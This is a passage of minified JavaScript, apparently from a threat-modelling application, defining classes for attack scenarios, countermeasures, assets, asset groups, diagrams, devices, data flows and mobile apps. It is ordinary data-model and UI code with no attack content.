e=this.Data.linkedScenarioIDs.indexOf(a);e>=0&&this.Data.linkedScenarioIDs.splice(e,1)}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}GetCountermeasures(){return this.project.GetCountermeasuresApplicable().filter(a=>a.AttackScenarios.includes(this))}GetTestCases(){return this.project.GetTestCases().filter(a=>a.LinkedScenarios.includes(this))}GetAffectedAssetObjects(){let a=[];return this.Target&&this.Target.GetProperty("ProcessedData")&&a.push(...this.Target.GetProperty("ProcessedData")),this.Targets&&this.Targets.forEach(e=>{e.GetProperty("ProcessedData")&&e.GetProperty("ProcessedData").forEach(i=>{a.includes(i)||a.push(i)})}),a}GetDiagram(){return this.project.GetView(this.ViewID)}CheckUniqueNumber(){return this.project.GetAttackScenarios().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){var a;return"AS"+Gi.EmptyIfNull(this.Number)+") "+this.Name+" ("+(this.Target?this.Target.GetProperty("Name"):null===(a=this.Targets)||void 0===a?void 0:a.map(e=>e.GetProperty("Name")).join(", "))+")"}FindReferences(a,e){let i=[];return null==a||a.GetCountermeasures().filter(n=>n.AttackScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromCountermeasure,Param:n})),null==a||a.GetAttackScenarios().filter(n=>n.LinkedScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromAttackScenario,Param:n})),null==a||a.GetTestCases().filter(n=>n.LinkedScenarios.includes(this)).forEach(n=>i.push({Type:li.RemoveAttackScenarioFromTestCase,Param:n})),i}OnDelete(a,e){this.MappingState=zn.Removed,this.FindReferences(a,e).forEach(n=>{n.Type==li.RemoveAttackScenarioFromCountermeasure?n.Param.RemoveAttackScenario(this.ID):(n.Type==li.RemoveAttackScenarioFromAttackScenario||n.Type==li.RemoveAttackScenarioFromTestCase)&&n.Param.RemoveLinkedAttackScenario(this.ID)})}static FromJSON(a,e,i){return new Rc(a,e,i)}}var lr=(()=>{return(t=lr||(lr={}))[t.Low=1]="Low",t[t.Medium=2]="Medium",t[t.High=3]="High",lr;var t})();class An{static GetKeys(){return[lr.Low,lr.Medium,lr.High]}static ToString(a){switch(a){case lr.Low:return"general.Low";case lr.Medium:return"general.Medium";case lr.High:return"general.High"}}}class Pu extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Sensitivity||(this.Sensitivity=lr.Medium),this.ImpactCats||(this.Data.ImpactCats=[])}get IsProjectData(){return null!=this.project}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get IsNewAsset(){return this.Data.IsNewAsset}set IsNewAsset(a){this.Data.IsNewAsset=a,a&&(this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"),this.properties.splice(2,0,this.properties.splice(this.GetProperties().length-1,1)[0]),this.properties.splice(this.GetProperties().findIndex(e=>e.Type==Ii.AssignNumberToAsset),1))}get Sensitivity(){return this.Data.Sensitivity}set Sensitivity(a){this.Data.Sensitivity=a&&Number(a)}get ImpactCats(){return this.Data.ImpactCats}FindAssetGroup(){return this.project?this.project.GetAssetGroups().find(a=>a.AssociatedData.includes(this)):this.config.GetAssetGroups().find(a=>a.AssociatedData.includes(this))}CheckUniqueNumber(){return this.project.GetMyDatas().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"A"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){let n=(this.IsProjectData?a:e).GetAssetGroups().find(r=>r.AssociatedData.includes(this));n&&n.RemoveMyData(this)}initProperties(){super.initProperties(),this.IsNewAsset?this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"):this.AddProperty("general.Number","","",!1,Ii.AssignNumberToAsset,!0),this.AddProperty("properties.Sensitivity","Sensitivity","",!0,Ii.LowMediumHighSelect,!0),Vs.GetKeys().forEach(a=>this.AddProperty(Vs.ToString(a),"ImpactCats-"+a.toString(),"",!1,Ii.ImpactCategory,!0,!1))}static FromJSON(a,e,i){return new Pu(a,e,i)}}let Zl=(()=>{class t extends Ln{constructor(e,i,n){super(e),this.project=i,this.config=n,this.Data.assetGroupIDs||(this.Data.assetGroupIDs=[]),this.Data.associatedDataIDs||(this.Data.associatedDataIDs=[]),this.ImpactCats||(this.Data.ImpactCats=[]),null==this.IsActive&&(this.IsActive=!0)}get file(){return this.IsProjectAsset?this.project:this.config}get IsProjectAsset(){return null!=this.project}get IsActive(){return this.Data.IsActive}set IsActive(e){this.Data.IsActive=e,e&&this.Parent?this.Parent.IsActive=e:e||this.SubGroups.forEach(i=>i.IsActive=e)}get Number(){return this.Data.Number}set Number(e){this.Data.Number=e&&String(e)}get IsNewAsset(){return this.Data.IsNewAsset}set IsNewAsset(e){this.Data.IsNewAsset=e,e&&(this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"),this.properties.splice(2,0,this.properties.splice(this.GetProperties().length-1,1)[0]),this.properties.splice(this.GetProperties().findIndex(i=>i.Type==Ii.AssignNumberToAsset),1))}get SubGroups(){let e=[];return this.Data.assetGroupIDs.forEach(i=>e.push(this.file.GetAssetGroup(i))),e}get AssociatedData(){let e=[];return this.Data.associatedDataIDs.forEach(i=>e.push(this.file.GetMyData(i))),e}set AssociatedData(e){this.Data.associatedDataIDs=null==e?void 0:e.map(i=>i.ID)}get Parent(){return this.file.GetAssetGroups().find(e=>e.SubGroups.includes(this))}get ImpactCats(){return this.Data.ImpactCats}AddAssetGroup(e){this.SubGroups.includes(e)||this.Data.assetGroupIDs.push(e.ID)}RemoveAssetGroup(e){this.SubGroups.includes(e)&&this.Data.assetGroupIDs.splice(this.Data.assetGroupIDs.indexOf(e.ID),1)}AddMyData(e){this.AssociatedData.includes(e)||this.Data.associatedDataIDs.push(e.ID)}RemoveMyData(e){this.AssociatedData.includes(e)&&this.Data.associatedDataIDs.splice(this.Data.associatedDataIDs.indexOf(e.ID),1)}GetMyDataFlat(){let e=[];return e.push(...this.AssociatedData),this.SubGroups.forEach(i=>e.push(...i.GetMyDataFlat())),e}GetGroupsFlat(){let e=[];return this.SubGroups.forEach(i=>{e.push(i),e.push(...i.GetGroupsFlat())}),e}CheckUniqueNumber(){return this.project.GetAssetGroups().some(e=>e.Number==this.Number&&e.ID!=this.ID)}GetLongName(){return"A"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(e,i){let n=[];return this.AssociatedData.forEach(r=>n.push({Type:li.DeleteMyData,Param:r})),this.SubGroups.forEach(r=>n.push({Type:li.DeleteAssetGroup,Param:r})),n}OnDelete(e,i){let n=this.file.GetAssetGroups().find(c=>c.SubGroups.includes(this));n&&n.RemoveAssetGroup(this),this.FindReferences(e,i).forEach(c=>{c.Type==li.DeleteMyData?this.file.DeleteMyData(c.Param):c.Type==li.DeleteAssetGroup&&this.file.DeleteAssetGroup(c.Param)})}initProperties(){super.initProperties(),this.IsNewAsset?this.AddProperty("general.Number","Number","",!0,Ii.TextBoxValidator,!0,null,"CheckUniqueNumber"):this.AddProperty("general.Number","","",!1,Ii.AssignNumberToAsset,!0),this.AddProperty("properties.IsActive","IsActive","",!0,Ii.CheckBox,!0),Vs.GetKeys().forEach(e=>this.AddProperty(Vs.ToString(e),"ImpactCats-"+e.toString(),"",!1,Ii.ImpactCategory,!0,!1))}static FromJSON(e,i,n){return new t(e,i,n)}}return t.Icon="account_balance",t})();var xn=(()=>{return(t=xn||(xn={})).Hardware="HW",t.DataFlow="DF",t.Context="CTX",t.UseCase="UC",xn;var t})();class as extends Ln{constructor(a,e,i){super(a),this.project=e,this.Settings||(this.Settings={GenerationThreatLibrary:!0,GenerationAssetBased:!1,GenerationMnemonics:{},GenerationRules:{}}),this.Settings.GenerationMnemonics||(this.Settings.GenerationMnemonics={}),this.Settings.GenerationRules||(this.Settings.GenerationRules={})}get elementsID(){return this.Data.elementsID}set elementsID(a){this.Data.elementsID=a}get Name(){return this.Data.Name}set Name(a){this.Data.Name=a,this.Elements&&(this.Elements.Name=a),this.NameChanged.emit(a)}get Canvas(){return this.Data.Canvas}set Canvas(a){a!=this.Data.Canvas&&(this.Data.Canvas=a)}get DiagramType(){return this.Data.DiagramType}set DiagramType(a){this.Data.DiagramType=a}get Settings(){return this.Data.Settings}set Settings(a){this.Data.Settings=a}static FromJSON(a,e,i){return a.DiagramType==xn.Hardware||a.DiagramType==xn.DataFlow?new Bg(a,e,i):a.DiagramType==xn.Context||a.DiagramType==xn.UseCase?new b2(a,e,i):void 0}}class Bg extends as{get Elements(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDFDElement(this.elementsID)}constructor(a,e,i){if(super(a,e,i),!this.Elements){let n=new Ys({},Ys.GetDefaultType(i),e,i);e.AddDFDElement(n),this.elementsID=n.ID}}FindReferences(a,e){let i=[];return this.Elements.GetChildrenFlat().forEach(n=>{i.push({Type:li.DeleteDFDElement,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteDFDElement&&a.DeleteDDFElement(n.Param)}),a.DeleteDDFElement(this.Elements)}static FromJSON(a,e,i){return new Bg(a,e,i)}}class b2 extends as{get Elements(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetContextElement(this.elementsID)}get IsUseCaseDiagram(){return this.Data.IsUseCaseDiagram}set IsUseCaseDiagram(a){this.Data.IsUseCaseDiagram=a}constructor(a,e,i){if(super(a,e,i),!this.elementsID){let n=new sf({},e,i);e.AddContextElement(n),this.elementsID=n.ID}}FindReferences(a,e){return[]}OnDelete(a,e){}}class pT extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.contextDiagramID||(this.ContextDiagram=e.CreateDiagram(xn.Context),this.ContextDiagram.Name="System Context",this.ContextDiagram.Elements.Name="System Context Diagram"),this.Data.useCaseDiagramID||(this.UseCaseDiagram=e.CreateDiagram(xn.UseCase),this.UseCaseDiagram.Name="Use Cases",this.UseCaseDiagram.Elements.Name="Use Case Diagram"),this.UseCaseDiagram&&(this.UseCaseDiagram.IsUseCaseDiagram=!0)}get ContextDiagram(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDiagram(this.Data.contextDiagramID)}set ContextDiagram(a){this.Data.contextDiagramID=a.ID}get UseCaseDiagram(){var a;return null===(a=this.project)||void 0===a?void 0:a.GetDiagram(this.Data.useCaseDiagramID)}set UseCaseDiagram(a){this.Data.useCaseDiagramID=a.ID}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new pT(a,e,i)}}var Aa=(()=>{return(t=Aa||(Aa={}))[t.None=0]="None",t[t.Device=1]="Device",t[t.Interface=2]="Interface",t[t.Interactor=3]="Interactor",t[t.UseCase=4]="UseCase",t[t.Flow=5]="Flow",t[t.TrustArea=6]="TrustArea",t[t.MobileApp=7]="MobileApp",t[t.ExternalEntity=8]="ExternalEntity",Aa;var t})();class nM{static Constructor(a){switch(a){case Aa.Device:return Ou;case Aa.MobileApp:return cf;case Aa.Interface:return xG;case Aa.Interactor:return AG;case Aa.UseCase:return b5;case Aa.Flow:return M2;case Aa.TrustArea:return sf;case Aa.ExternalEntity:return wG;default:return console.error("Missing Element Type in ContextElementTypeUtil.Constructor()",a),null}}static ToString(a){switch(a){case Aa.Device:return"Device";case Aa.MobileApp:return"App";case Aa.Interface:return"Device Interface";case Aa.Interactor:return"Interactor";case Aa.UseCase:return"Use Case";case Aa.Flow:return"Flow";case Aa.TrustArea:return"Trust Area";case Aa.ExternalEntity:return"External Entity";case Aa.None:return"Container";default:return console.error("Missing Element Type in ContextElementTypeUtil.ToString()",a),null}}}class ns extends Lp{constructor(a,e,i,n){var r;super(a),this.TypeChanged=new Tt,this.project=i,this.Type=e,0==(null===(r=this.Name)||void 0===r?void 0:r.length)&&(this.Name=i?Gi.FindUniqueName(nM.ToString(e),i.GetContextElements().map(c=>c.GetProperty("Name"))):e.toString())}get Type(){return this.Data.Type}set Type(a){this.Data.Type=a,this.TypeChanged.emit(a)}get Parent(){return this.project.GetContextElement(this.Data.parentID)||null}set Parent(a){this.Parent&&this.Parent.ID!=a.ID&&this.Parent.RemoveChild(this),this.Data.parentID=a.ID}FindReferences(a,e){let i=super.FindReferences(a,e);return null==a||a.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).forEach(n=>i.push({Type:li.DeleteElementReferences,Param:n})),null==a||a.GetContextElements().filter(n=>{var r,c;return n instanceof M2&&[null===(r=n.Sender)||void 0===r?void 0:r.ID,null===(c=n.Receiver)||void 0===c?void 0:c.ID].includes(this.ID)}).forEach(n=>i.push({Type:li.DeleteContextFlow,Param:n})),i}OnDelete(a,e){super.OnDelete(a,e),this.FindReferences(a,e).forEach(n=>{(n.Type==li.DeleteElementReferences||n.Type==li.DeleteContextFlow)&&a.DeleteContextElement(n.Param)}),null!=this.Parent&&this.Parent.RemoveChild(this)}static Instantiate(a,e,i){return new(nM.Constructor(a))({},e,i)}static FromJSON(a,e,i){let n,r=a.Type;if(a.refID)n=new As(a,a.Type,e,i);else if(r==Aa.Device)n=new Ou(a,e,i);else if(r==Aa.MobileApp)n=new cf(a,e,i);else if(r==Aa.Interface)n=new xG(a,e,i);else if(r==Aa.Interactor)n=new AG(a,e,i);else if(r==Aa.UseCase)n=new b5(a,e,i);else if(r==Aa.Flow)n=new M2(a,e,i);else if(r==Aa.ExternalEntity)n=new wG(a,e,i);else{if(r!=Aa.None)throw new Error("Unknown Type: "+a.Type);n=new sf(a,e,i)}return n}}var So=(()=>{return(t=So||(So={})).None="properties.deviceinterfacenames.None",t.HumanInterface="properties.deviceinterfacenames.HumanInterface",t.MachineInterface="properties.deviceinterfacenames.MachineInterface",t.Environment="properties.deviceinterfacenames.Environment",So;var t})();let Ou=(()=>{class t extends ns{constructor(e,i,n){if(super(e,Aa.Device,i,n),this.DeviceInterfaceNameChanged=new Tt,!this.Data.assetGroupID){let r=i.InitializeNewAssetGroup(n);this.Data.assetGroupID=r.ID}this.Data.hardwareDiagramID||(this.HardwareDiagram=i.CreateDiagram(xn.Hardware)),this.Data.softwareStackID||this.CreateSoftwareStack(),0==i.GetDevices().length&&!this.Data.processStackID&&this.CreateProcessStack(),this.Data.checklistIDs||(this.Data.checklistIDs=[]),null==this.InterfaceTop&&(this.InterfaceTop=So.None,this.InterfaceRight=So.MachineInterface,this.InterfaceBottom=So.Environment,this.InterfaceLeft=So.HumanInterface),this.Name=this.Name}get Name(){return this.Data.Name}set Name(e){this.Data.Name=e,null!=this.HardwareDiagram&&(this.HardwareDiagram.Name=this.Name+"'s Hardware"),null!=this.SoftwareStack&&(this.SoftwareStack.Name=this.Name+"'s Software"),null!=this.ProcessStack&&(this.ProcessStack.Name=this.Name+"'s Processes"),this.NameChanged.emit(e)}get AssetGroup(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetAssetGroup(this.Data.assetGroupID)}get HardwareDiagram(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetDiagram(this.Data.hardwareDiagramID)}set HardwareDiagram(e){this.Data.hardwareDiagramID=e.ID}get SoftwareStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.softwareStackID)}set SoftwareStack(e){this.Data.softwareStackID=e.ID}get ProcessStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.processStackID)}set ProcessStack(e){this.Data.processStackID=e.ID}get InterfaceTop(){return this.Data.InterfaceTop}set InterfaceTop(e){this.Data.InterfaceTop=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceRight(){return this.Data.InterfaceRight}set InterfaceRight(e){this.Data.InterfaceRight=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceBottom(){return this.Data.InterfaceBottom}set InterfaceBottom(e){this.Data.InterfaceBottom=e,this.DeviceInterfaceNameChanged.emit()}get InterfaceLeft(){return this.Data.InterfaceLeft}set InterfaceLeft(e){this.Data.InterfaceLeft=e,this.DeviceInterfaceNameChanged.emit()}get Checklists(){let e=[];return this.Data.checklistIDs.forEach(i=>e.push(this.project.GetChecklist(i))),e}set Checklists(e){this.Data.checklistIDs=null==e?void 0:e.map(i=>i.ID)}CreateSoftwareStack(){return this.SoftwareStack||(this.SoftwareStack=this.project.CreateStack(zr.Software),this.project.Config.GetMyComponentSWTypeGroups().forEach(e=>e.Types.forEach(i=>this.SoftwareStack.AddChild(this.project.CreateComponent(i)))),this.SoftwareStack.Name=this.Name+"'s Software"),this.SoftwareStack}DeleteSoftwareStack(){this.project.DeleteStack(this.SoftwareStack)}CreateProcessStack(){return this.ProcessStack||(this.ProcessStack=this.project.CreateStack(zr.Process),this.project.Config.GetMyComponentPTypeGroups().forEach(e=>e.Types.forEach(i=>this.ProcessStack.AddChild(this.project.CreateComponent(i)))),this.ProcessStack.Name=this.Name+"'s Processes"),this.ProcessStack}DeleteProcessStack(){this.project.DeleteStack(this.ProcessStack)}AddChecklist(e){this.Checklists.includes(e)||this.Data.checklistIDs.push(e.ID)}RemoveChecklist(e){this.Checklists.includes(e)&&this.Data.checklistIDs.splice(this.Data.checklistIDs.indexOf(e.ID),1)}GetAttackScenariosApplicable(){let e=[];this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.HardwareDiagram&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.HardwareDiagram.ID)),this.SoftwareStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}GetCountermeasuresApplicable(){let e=[];this.project.GetCountermeasures().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return i&&this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.project.GetSysContext().UseCaseDiagram.ID).filter(n=>n.Targets.includes(i)).forEach(n=>e.push(n)),this.HardwareDiagram&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.HardwareDiagram.ID)),this.SoftwareStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.SoftwareStack.ID)),this.ProcessStack&&e.push(...this.project.GetCountermeasuresApplicable().filter(n=>n.ViewID==this.ProcessStack.ID)),e}FindReferences(e,i){let n=super.FindReferences(e,i);return this.HardwareDiagram&&n.push({Type:li.DeleteDiagram,Param:this.HardwareDiagram}),this.SoftwareStack&&n.push({Type:li.DeleteStack,Param:this.SoftwareStack}),this.ProcessStack&&n.push({Type:li.DeleteStack,Param:this.ProcessStack}),this.AssetGroup&&n.push({Type:li.DeleteAssetGroup,Param:this.AssetGroup}),this.Checklists.forEach(r=>n.push({Type:li.DeleteChecklist,Param:r})),n}OnDelete(e,i){super.OnDelete(e,i),this.FindReferences(e,i).forEach(r=>{r.Type==li.DeleteDiagram?e.DeleteDiagram(r.Param):r.Type==li.DeleteStack?e.DeleteStack(r.Param):r.Type==li.DeleteAssetGroup?e.DeleteAssetGroup(r.Param):r.Type==li.DeleteChecklist&&e.DeleteChecklist(r.Param)})}initProperties(){super.initProperties(),this.AddProperty("properties.InterfaceTop","InterfaceTop","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceRight","InterfaceRight","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceBottom","InterfaceBottom","",!0,Ii.DevInterfaceName,!0),this.AddProperty("properties.InterfaceLeft","InterfaceLeft","",!0,Ii.DevInterfaceName,!0)}}return t.Icon="memory",t})();class sf extends ns{constructor(a,e,i){super(a,Aa.None,e,i),this.ChildrenChanged=new Tt,this.Data.childrenIDs||(this.Data.childrenIDs=[])}get children(){let a=[];return this.Data.childrenIDs.forEach(e=>a.push(this.project.GetContextElement(e))),a.sort((e,i)=>e.GroupId>=i.GroupId?1:-1)}get Root(){return this.project.GetContextElement(this.Data.rootID)}set Root(a){this.Data.rootID=null==a?void 0:a.ID}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}AddChild(a){null!=a?this.Data.childrenIDs.includes(a.ID)||(this.Data.childrenIDs.push(a.ID),a.Parent=this,this.project.AddContextElement(a),a instanceof sf&&(a.Root=this.Root?this.Root:this),this.Root?this.Root.ChildrenChanged.emit(!0):this.ChildrenChanged.emit(!0)):console.error("child undefined")}RemoveChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}DeleteChild(a){const e=this.Data.childrenIDs.indexOf(a.ID);return e>=0&&(this.Data.childrenIDs.splice(e,1),this.project.DeleteContextElement(a),this.Root?this.Root.ChildrenChanged.emit(!1):this.ChildrenChanged.emit(!1)),e>=0}GetChildren(){return this.children}GetChildrenFlat(){let a=[];return a.push(...this.GetChildren()),this.GetChildren().forEach(e=>{e instanceof sf&&a.push(...e.GetChildrenFlat())}),a}FindReferences(a,e){let i=super.FindReferences(a,e);return this.children.length>0&&i.push({Type:li.MoveChildElements,Param:this.Parent}),i}OnDelete(a,e){super.OnDelete(a,e),this.FindReferences(a,e).forEach(n=>{n.Type==li.MoveChildElements&&this.GetChildren().forEach(r=>this.Parent.AddChild(r))})}}class AG extends ns{constructor(a,e,i){super(a,Aa.Interactor,e,i)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}var ed=(()=>{return(t=ed||(ed={}))[t.Solid=1]="Solid",t[t.Dashed=2]="Dashed",ed;var t})();class TG{static GetKeys(){return[ed.Solid,ed.Dashed]}static ToString(a){switch(a){case ed.Solid:return"properties.Solid";case ed.Dashed:return"properties.Dashed"}}}var wn=(()=>{return(t=wn||(wn={}))[t.Start=1]="Start",t[t.End=2]="End",t[t.Both=3]="Both",t[t.Initiator=4]="Initiator",t[t.None=5]="None",wn;var t})();class EG{static GetKeys(){return[wn.Start,wn.End,wn.Both,wn.Initiator,wn.None]}static ToString(a){switch(a){case wn.Start:return"properties.flowarrowpositions.Start";case wn.End:return"properties.flowarrowpositions.End";case wn.Both:return"properties.flowarrowpositions.Both";case wn.Initiator:return"properties.flowarrowpositions.Initiator";case wn.None:return"properties.flowarrowpositions.None"}}}var Xs=(()=>{return(t=Xs||(Xs={}))[t.Normal=1]="Normal",t[t.Extend=2]="Extend",t[t.Include=3]="Include",Xs;var t})();class DG{static GetKeys(){return[Xs.Normal,Xs.Extend,Xs.Include]}static ToString(a){switch(a){case Xs.Normal:return"properties.Normal";case Xs.Extend:return"properties.Extend";case Xs.Include:return"properties.Include"}}}class M2 extends ns{constructor(a,e,i){super(a,Aa.Flow,e,i),this.LineTypeChanged=new Tt,this.ArrowPosChanged=new Tt,this.BendFlowChanged=new Tt,this.DirectionChanged=new Tt,this.AnchorChanged=new Tt,this.Data.FlowType||(this.FlowType=Xs.Normal),this.Data.LineType||(this.LineType=ed.Solid),this.Data.ArrowPos||(this.ArrowPos=wn.End),null==this.Data.ShowName&&(this.ShowName=!1)}get Sender(){return this.project.GetContextElement(this.Data.senderID)}set Sender(a){this.Data.senderID=null==a?void 0:a.ID}get Receiver(){return this.project.GetContextElement(this.Data.receiverID)}set Receiver(a){this.Data.receiverID=null==a?void 0:a.ID}get FlowType(){return this.Data.FlowType}set FlowType(a){this.Data.FlowType=Number(a),a==Xs.Extend||a==Xs.Include?(this.ShowName=!0,this.LineType=ed.Dashed,this.ArrowPos=a==Xs.Extend?wn.Start:wn.End):(this.ShowName=!1,this.LineType=ed.Solid,this.ArrowPos=wn.End),this.NameChanged.emit(this.Name)}get ShowName(){return this.Data.ShowName}set ShowName(a){this.Data.ShowName=a,this.NameChanged.emit(this.GetProperty("Name"))}get BendFlow(){return this.Data.BendFlow}set BendFlow(a){this.Data.BendFlow=a,this.BendFlowChanged.emit(a)}get LineType(){return this.Data.LineType}set LineType(a){this.Data.LineType=Number(a),this.LineTypeChanged.emit(a)}get ArrowPos(){return this.Data.ArrowPos}set ArrowPos(a){this.Data.ArrowPos=Number(a),this.ArrowPosChanged.emit(a)}ChangeDirection(){let a=this.Sender;this.Sender=this.Receiver,this.Receiver=a,this.DirectionChanged.emit()}initProperties(){super.initProperties(),this.AddProperty("properties.Sender","Sender","",!0,Ii.ElementName,!0),this.AddProperty("properties.Receiver","Receiver","",!0,Ii.ElementName,!0),this.AddProperty("properties.Direction","","",!1,Ii.DataFlowChangeDirection,!0),this.AddProperty("properties.FlowType","FlowType","",!0,Ii.FlowType,!0),this.AddProperty("properties.ShowName","ShowName","",!0,Ii.CheckBox,!0),this.AddProperty("properties.BendFlow","BendFlow","",!0,Ii.CheckBox,!0),this.AddProperty("properties.LineType","LineType","",!0,Ii.LineType,!0),this.AddProperty("properties.ArrowPos","ArrowPos","",!0,Ii.ArrowPosition,!0)}}class xG extends ns{constructor(a,e,i){super(a,Aa.Interface,e,i)}initProperties(){super.initProperties(),this.GetProperties().find(a=>"Name"==a.ID).Type=Ii.TextBox}}class b5 extends ns{get DataFlowDiagramID(){return this.Data.dataFlowDiagramID}set DataFlowDiagramID(a){this.Data.dataFlowDiagramID=a}constructor(a,e,i){super(a,Aa.UseCase,e,i)}initProperties(){super.initProperties(),this.AddProperty("properties.DataFlowDiagram","DataFlowDiagramID","properties.DataFlowDiagram.tt",!0,Ii.DataFlowDiagramReference,!0),this.AddProperty("properties.OpenDataFlowDiagram","DataFlowDiagramID","",!0,Ii.DataFlowDiagramReference,!1)}}let cf=(()=>{class t extends ns{constructor(e,i,n){if(super(e,Aa.MobileApp,i,n),this.MobileAppInterfaceNameChanged=new Tt,!this.Data.assetGroupID){let r=i.InitializeNewAssetGroup(n);this.Data.assetGroupID=r.ID}this.Data.checklistIDs||(this.Data.checklistIDs=[]),null==this.InterfaceTop&&(this.InterfaceTop=So.None,this.InterfaceRight=So.MachineInterface,this.InterfaceBottom=So.None,this.InterfaceLeft=So.HumanInterface),this.Name=this.Name}get Name(){return this.Data.Name}set Name(e){this.Data.Name=e,null!=this.SoftwareStack&&(this.SoftwareStack.Name=this.Name+"'s Software"),null!=this.ProcessStack&&(this.ProcessStack.Name=this.Name+"'s Processes"),this.NameChanged.emit(e)}get AssetGroup(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetAssetGroup(this.Data.assetGroupID)}get SoftwareStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.softwareStackID)}set SoftwareStack(e){this.Data.softwareStackID=e.ID}get ProcessStack(){var e;return null===(e=this.project)||void 0===e?void 0:e.GetStack(this.Data.processStackID)}set ProcessStack(e){this.Data.processStackID=e.ID}get InterfaceTop(){return this.Data.InterfaceTop}set InterfaceTop(e){this.Data.InterfaceTop=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceRight(){return this.Data.InterfaceRight}set InterfaceRight(e){this.Data.InterfaceRight=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceBottom(){return this.Data.InterfaceBottom}set InterfaceBottom(e){this.Data.InterfaceBottom=e,this.MobileAppInterfaceNameChanged.emit()}get InterfaceLeft(){return this.Data.InterfaceLeft}set InterfaceLeft(e){this.Data.InterfaceLeft=e,this.MobileAppInterfaceNameChanged.emit()}get Checklists(){let e=[];return this.Data.checklistIDs.forEach(i=>e.push(this.project.GetChecklist(i))),e}set Checklists(e){this.Data.checklistIDs=null==e?void 0:e.map(i=>i.ID)}CreateSoftwareStack(){return this.SoftwareStack||(this.SoftwareStack=this.project.CreateStack(zr.Software)),this.SoftwareStack}DeleteSoftwareStack(){this.project.DeleteStack(this.SoftwareStack)}CreateProcessStack(){return this.ProcessStack||(this.ProcessStack=this.project.CreateStack(zr.Process),this.project.Config.GetMyComponentPTypeGroups().forEach(e=>e.Types.forEach(i=>this.ProcessStack.AddChild(this.project.CreateComponent(i))))),this.ProcessStack}DeleteProcessStack(){this.project.DeleteStack(this.ProcessStack)}AddChecklist(e){this.Checklists.includes(e)||this.Data.checklistIDs.push(e.ID)}RemoveChecklist(e){this.Checklists.includes(e)&&this.Data.checklistIDs.splice(this.Data.checklistIDs.indexOf(e.ID),1)}GetAttackScenariosApplicable(){let e=[];this.project.GetAttackScenariosApplicable().filter(n=>n.ViewID==this.project.GetSysContext().ContextDiagram.ID).filter(n=>n.Targets.includes(this)).forEach(n=>e.push(n));let i=this.project.GetContextElementRefs().filter(n=>n.Ref.ID==this.ID).find(n=>{var r;return(null===(r=this.project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)==this.project.GetSysContext().UseCaseDiagram.ID});return 